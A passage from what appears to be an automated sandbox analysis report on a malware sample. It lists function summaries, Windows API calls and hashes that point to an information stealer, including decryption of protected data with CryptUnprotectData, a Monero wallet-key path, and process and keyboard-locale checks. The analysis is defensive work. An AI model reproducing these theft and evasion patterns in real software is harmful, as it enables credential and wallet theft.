                              • Instruction ID: a1baeaa42b66428280e1088d4dd914331f0b56d7d90f903befbd9d5f98b4583b
                              • Opcode Fuzzy Hash: b4287a481f0c5099730c3f110a3235b3e57d39f48514e55985c8b86f1467d97b
                              • Instruction Fuzzy Hash: 0B914872900104A7CB14FBB0ED56EED737DAFA4300F808569F90A96281EF35DB19CB96
                              Function 0058AF90 Relevance: 12.9, Strings: 9, Instructions: 1685COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $Wy$5!kw$<Cl$?{U$c>$foSo$mC-?$ux$}4wK
                              • API String ID: 0-1598493436
                              • Opcode ID: 2dc61b851fd47ad46c8af5b9e9a76c1c9709f96f94b84cbb43540626e892bd22
                              • Instruction ID: 30b9f1da6b70c3b93eba7976391feac778840da3e7ec48d305f3d5c6e6e855bb
                              • Opcode Fuzzy Hash: 2dc61b851fd47ad46c8af5b9e9a76c1c9709f96f94b84cbb43540626e892bd22
                              • Instruction Fuzzy Hash: 35B207F3A086109FE304AE2DEC4567AB7E6EFD4620F1A853DEAC4D3744EA35580587D2
                              Function 001D7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,001E05AF), ref: 001D7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 001D7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 001D7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 001D7C62
                              • LocalFree.KERNEL32(00000000), ref: 001D7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: ab9f66a5411096324883d0c244dfe4778822bc1226879aae9068aa0ad16ae1e0
                              • Instruction ID: 42e78ddd978dd5741c2c707d564f3b322e6162c6bf8f37f008edf10f70f16de1
                              • Opcode Fuzzy Hash: ab9f66a5411096324883d0c244dfe4778822bc1226879aae9068aa0ad16ae1e0
                              • Instruction Fuzzy Hash: 36416D71940228ABCB24DF94DC99BEEB378FF58700F6041DAE40962280DB742F85CFA5
                              Function 00590200 Relevance: 10.4, Strings: 7, Instructions: 1618COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: /3?$6>7{$QPx_$n\~w$sV/6$wz}_$x8r~
                              • API String ID: 0-2427404793
                              • Opcode ID: f31c853b1f8cee1c12d282b768b29d2c879c20405a108f390363e028f796223d
                              • Instruction ID: 6f60c3bb6d0eab8ba5ff72f62d4f1ca5af30ea093ca3ccfbf8433af73d59e9c0
                              • Opcode Fuzzy Hash: f31c853b1f8cee1c12d282b768b29d2c879c20405a108f390363e028f796223d
                              • Instruction Fuzzy Hash: 3DB208F360C2049FE304AE29DC8567AFBE9EFD4360F16893DEAC4C7744E67598018696
                              Function 001CE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,001E0D73), ref: 001CE4A2
                              • StrCmpCA.SHLWAPI(?,001E14F8), ref: 001CE4F2
                              • StrCmpCA.SHLWAPI(?,001E14FC), ref: 001CE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001CEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: a8b4c378421adea72428ff6a29da2220fb929a4b69d251a463f0f06e9015c6f0
                              • Instruction ID: 3a6bbf247d11cfd55fd86ad8f296845e6593ee70615a29b4bed862babd161d84
                              • Opcode Fuzzy Hash: a8b4c378421adea72428ff6a29da2220fb929a4b69d251a463f0f06e9015c6f0
                              • Instruction Fuzzy Hash: 8E1246719101549BDB18FB70DCA6EEE7378AF64300FC045AAB50A96291EF306F49CF96
                              Function 0059BDAF Relevance: 7.9, Strings: 5, Instructions: 1643COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0Xo$0{y$5Y?$AAn$ans\
                              • API String ID: 0-2700961280
                              • Opcode ID: 62d2f0453f637a77619f8e3f40f9106742d97d71c9a842e9725d7a8f67ce2633
                              • Instruction ID: ae206a1ee0012bd2d37d657e665cffcafee999760eaa9e5bc55b26bbe8dcac71
                              • Opcode Fuzzy Hash: 62d2f0453f637a77619f8e3f40f9106742d97d71c9a842e9725d7a8f67ce2633
                              • Instruction Fuzzy Hash: C4B20AF3A082049FE304AE2DEC8567AFBE9EFD4720F16493DEAC4C7744E93558058696
                              Function 0059A45F Relevance: 7.8, Strings: 5, Instructions: 1518COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: /!L^$V*?-$]g$bVz>$+y:
                              • API String ID: 0-1154795837
                              • Opcode ID: 74a6d019a9f75718ca3571dfdb8d5d3a892e4daa5c4232de6d00968b2946249f
                              • Instruction ID: 5b5910738b44f93771943fc767533050e4bb51b7b1f63f1fd2c028ef5cd17be7
                              • Opcode Fuzzy Hash: 74a6d019a9f75718ca3571dfdb8d5d3a892e4daa5c4232de6d00968b2946249f
                              • Instruction Fuzzy Hash: 0FA2D3F3608200AFE7146E29EC8577AFBE9EF94720F1A493DEAC4C7740E63558418697
                              Function 001CC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 001CC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 001CC87C
                              • lstrcat.KERNEL32(?,001E0B46), ref: 001CC943
                              • lstrcat.KERNEL32(?,001E0B47), ref: 001CC957
                              • lstrcat.KERNEL32(?,001E0B4E), ref: 001CC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 1911d7b6d51c62eac726bcd88b82c0d5b2a3ed905d143429b61b082b253184e3
                              • Instruction ID: 5b1f5888ea485de3d4157b1037588bf91de92af5cc62f9fade9c1a2ccb2574dc
                              • Opcode Fuzzy Hash: 1911d7b6d51c62eac726bcd88b82c0d5b2a3ed905d143429b61b082b253184e3
                              • Instruction Fuzzy Hash: 8A415EB590421ADBDB10DF90DD89FFEB7B8BB48704F1045A8E509B6280D7749A84CF96
                              Function 001D6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 001D696C
                              • sscanf.NTDLL ref: 001D6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001D69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001D69C0
                              • ExitProcess.KERNEL32 ref: 001D69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: a69c39efe0fb7316da4bd483f9e710a28d80b0e0a2bd8714fa610f30df56ad32
                              • Instruction ID: ba96b0b3d86b069de926744f545de427a653afba36feaa7c05b26bc2a1350a4f
                              • Opcode Fuzzy Hash: a69c39efe0fb7316da4bd483f9e710a28d80b0e0a2bd8714fa610f30df56ad32
                              • Instruction Fuzzy Hash: C021CB76D14208AFCF08EFE4D955AEEB7B9BF48304F04852AE406F3250EB345615CBA9
                              Function 001C7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 001C724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 001C7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001C72A4
                              • LocalFree.KERNEL32(?), ref: 001C72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 96b325f3b2eace8405d8bb3dc8d0bc8fe8500cc9063b822db3174a5cb5f0e1c1
                              • Instruction ID: d261f1ddfd88882f5cb6379a272cd43dd7934c52360cf1151057a43cd4ad3bac
                              • Opcode Fuzzy Hash: 96b325f3b2eace8405d8bb3dc8d0bc8fe8500cc9063b822db3174a5cb5f0e1c1
                              • Instruction Fuzzy Hash: 4D0100B5A40308BBEB14DBD4CD49F9D7778AB44700F108558FB05BB2C0D7B0AA118B69
                              Function 001D9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001D961E
                              • Process32First.KERNEL32(001E0ACA,00000128), ref: 001D9632
                              • Process32Next.KERNEL32(001E0ACA,00000128), ref: 001D9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 001D965C
                              • CloseHandle.KERNEL32(001E0ACA), ref: 001D967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: d30e3a431c3cda1dcb33abb829e9db12231dbdbf922a965ae2b1413f9e61c2bd
                              • Instruction ID: e71cd0cb5e2e9a2f63f3b9b23596574e4037a720a9c7e49e0701c7134a8d1113
                              • Opcode Fuzzy Hash: d30e3a431c3cda1dcb33abb829e9db12231dbdbf922a965ae2b1413f9e61c2bd
                              • Instruction Fuzzy Hash: 8E010CB5A00308ABDB14DFA5CD48BEDB7F8EB48700F108199A905A7340E734DB50CF51
                              Function 0058E6BB Relevance: 6.6, Strings: 4, Instructions: 1617COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
